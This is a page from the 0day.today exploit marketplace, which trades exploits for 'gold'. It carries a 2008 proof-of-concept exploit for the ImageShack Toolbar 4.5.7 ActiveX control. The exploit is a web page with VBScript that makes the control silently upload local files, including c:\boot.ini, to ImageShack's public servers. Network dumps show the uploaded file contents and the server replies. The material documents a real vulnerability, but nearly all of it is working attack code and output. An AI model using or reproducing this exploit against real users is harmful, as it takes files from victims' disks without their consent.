[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ platforms ]  [ pentest ]  [ search ]  [ faq ]  [ contact ]  [ style ]  [ Prices in Gold ]   db: 39 583    
0day Today Exploit DB Official Facebook
0day Today Exploit DB Official Twitter
0day Today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Biggest Exploit Database in the World.
Select your language:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Things you should know about 0day.today:
  • We use one main domain: http://0day.today
  • Most of the materials is completely FREE
  • If you want to purchase the exploit / get V.I.P. access or pay for any other service,
    you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
           
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
  1. Read the [ agreement ]
  2. Read the [ Submit ] rules
  3. Visit the [ faq ] page
  4. [ Register ] profile
  5. Get [ GOLD ]
  6. If you want to [ sell ]
  7. If you want to [ buy ]
  8. If you lost [ Account ]
  9. Any questions [ admin@0day.today ]


Main links


You can contact us by

Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Exploits Market and 0day Exploits Database

ImageShack Toolbar 4.5.7 FileUploader Class Insecure Method PoC

Author
rgod
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9122
Category
remote exploits
Date add
24-01-2008
Platform
unsorted
===============================================================
ImageShack Toolbar 4.5.7 FileUploader Class Insecure Method PoC
===============================================================

<!--
ImageShack Toolbar 4.5.7 FileUploader Class (ImageShackToolbar.dll) insecure
method poc

This tool may allow a malicious web page to post arbitrary images on the web
from a user hard drive. Images will be visible on ImageShack site, a way for an
attacker to retrieve them maybe tag search or by understanding the renaming
operation, ex. "_" chars are removed and the "tq2" string is appended.
My test image is still visible here:
http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg
Note that a file with a non-image extension can cross the network, Imageshack
server replies with an error message, however this needs further investigation
that I let you to do, ex. with custom packet fields injection.

I suggest users to uninstall it temporarily an just use the site functionalities

Object safety report:

RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller

rgod-tsid-pa-he-ru-ka
-
stay tuned with us ...
http://retrogod.altervista.org/join.html
security feeds, radio streams, techno/drum & bass stations to come
-->

<html>
<body>
<object classid='clsid:BDF9442E-9B03-42C2-87BA-2A459B0A5317' id='suntzu' /></object>
<script language='vbscript'>
suntzu.BuildSlideShow "file:///c:\\xp_wallpaper_glass.jpg","Big",1,"uhuhinterestingprivatethings","Fade","White"
suntzu.BuildSlideShow "file:///c:\\boot.ini", "Big",1,"uhuhinterestingprivatethings","Fade","White"
</script>
</body>
</html>

----

some wireshark's dump samples:

POST /upload_api.php HTTP/1.1
Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y731553141
Content-Length: 21755
User-Agent: ImageShack Toolbar 4.5.7 ([..])
Host: load9.imageshack.us
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: imgshck=[..]; un_cookie=1; latest=img404; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1

--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="toolbar"

IEImageShackToolbar-4.5.7.69
--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="public"

yes
--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="xml"

newformat
--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="tags"

uhuhinterestingprivatethings
--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="rembar"

1
--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="fileupload"; filename="xp_wallpaper_glass.jpg"
Content-Type: image/jpeg
Content-Transfer-Encoding: binary

[file content]
--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="thumbupload"; filename="xp_wallpaper_glass6fa1f1.jpg"
Content-Type: image/jpeg
Content-Transfer-Encoding: binary

[file content]
--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="class"

s
--B-O-U-N-D-A-R-Y731553141--


reply:

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
X-Powered-By: PHP/5.1.2
Set-Cookie: latest=img262; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us
Set-Cookie: PHPSESSID=[..]; path=/
Set-Cookie: always_opt=-1; path=/; domain=.imageshack.us
Set-Cookie: rem_bar=1; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-type: text/xml
Pragma: public
Cache-Control: must-revalidate, post-check=0, pre-check=0
Date: Thu, 24 Jan 2008 07:56:25 GMT
Server: lighttpd/1.4.8

<?xml version="1.0" encoding="iso-8859-1"?><imginfo xmlns="http//ns.imageshack.us/imginfo/6/" version="6" timestamp="1201161385">
  <rating>
    <ratings>0</ratings>
    <avg>0.0</avg>
  </rating>
  <files server="262" bucket="7959">
     <image size="16646" content-type="image/jpeg">xpwallpaperglasstq2.jpg</image>
     <thumb size="3155" content-type="image/jpeg">xpwallpaperglasstq2.th.jpg</thumb>
  </files>
  <resolution>
    <width>426</width>
    <height>320</height>
  </resolution>
  <class>s</class>
  <uploader>
    <ip>87.11.97.155</ip>
  </uploader>
  <links>
    <image_link>http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg</image_link>
    <image_html><a href="http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg" target="_blank"><img src="http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg" alt="Free Image Hosting at www.ImageShack.us" border="0"/></a></image_html>
    <image_bb>[URL=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][IMG]http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg[/IMG][/URL]</image_bb>
    <image_bb2>[url=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][img=http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg][/url]</image_bb2>
    <thumb_link>http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg</thumb_link>
    <thumb_html><a href="http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg" target="_blank"><img src="http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg" alt="Free Image Hosting at www.ImageShack.us" border="0"/></a></thumb_html>
    <thumb_bb>[URL=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][IMG]http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg[/IMG][/URL]</thumb_bb>
    <thumb_bb2>[url=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][img=http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg][/url]</thumb_bb2>
    <ad_link>http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg</ad_link>
    <done_page>http://img262.imageshack.us/content.php?page=done&l=img262/7959/xpwallpaperglasstq2.jpg</done_page>
  </links>
</imginfo>

with the boot.ini file:

POST /upload_api.php HTTP/1.1
Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y732118720442
Content-Length: 1077
User-Agent: ImageShack Toolbar 4.5.7 (WinNT 5.1 Service Pack 2)
Host: load10.imageshack.us
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: imgshck=[..]; un_cookie=1; latest=img214; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1; always_opt=-1

--B-O-U-N-D-A-R-Y732118720442
Content-Disposition: form-data; name="toolbar"

IEImageShackToolbar-4.5.7.69
--B-O-U-N-D-A-R-Y732118720442
Content-Disposition: form-data; name="public"

yes
--B-O-U-N-D-A-R-Y732118720442
Content-Disposition: form-data; name="xml"

newformat
--B-O-U-N-D-A-R-Y732118720442
Content-Disposition: form-data; name="tags"

uhuhinterestingprivatethings
--B-O-U-N-D-A-R-Y732118720442
Content-Disposition: form-data; name="rembar"

1
--B-O-U-N-D-A-R-Y732118720442
Content-Disposition: form-data; name="fileupload"; filename="boot.ini"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home Edition" / fastdetect /NoExecute=OptIn
--B-O-U-N-D-A-R-Y732118720442
Content-Disposition: form-data; name="class"

s
--B-O-U-N-D-A-R-Y732118720442--

reply:

HTTP/1.1 200 OK
Transfer-Encoding: chunked
X-Powered-By: PHP/5.1.2
Content-Type: text/xml
Set-Cookie: latest=img89; expires=Sun, 18-Jan-2009 07:56:28 GMT; path=/; domain=.imageshack.us
Date: Thu, 24 Jan 2008 07:56:28 GMT
Server: lighttpd/1.4.18

<links>
<error id="wrong_file_type">Wrong file type detected for file boot.ini:application/octet-stream</error>
</links>



#  0day.today [2024-11-15]  #
0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
Send all submissions to mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team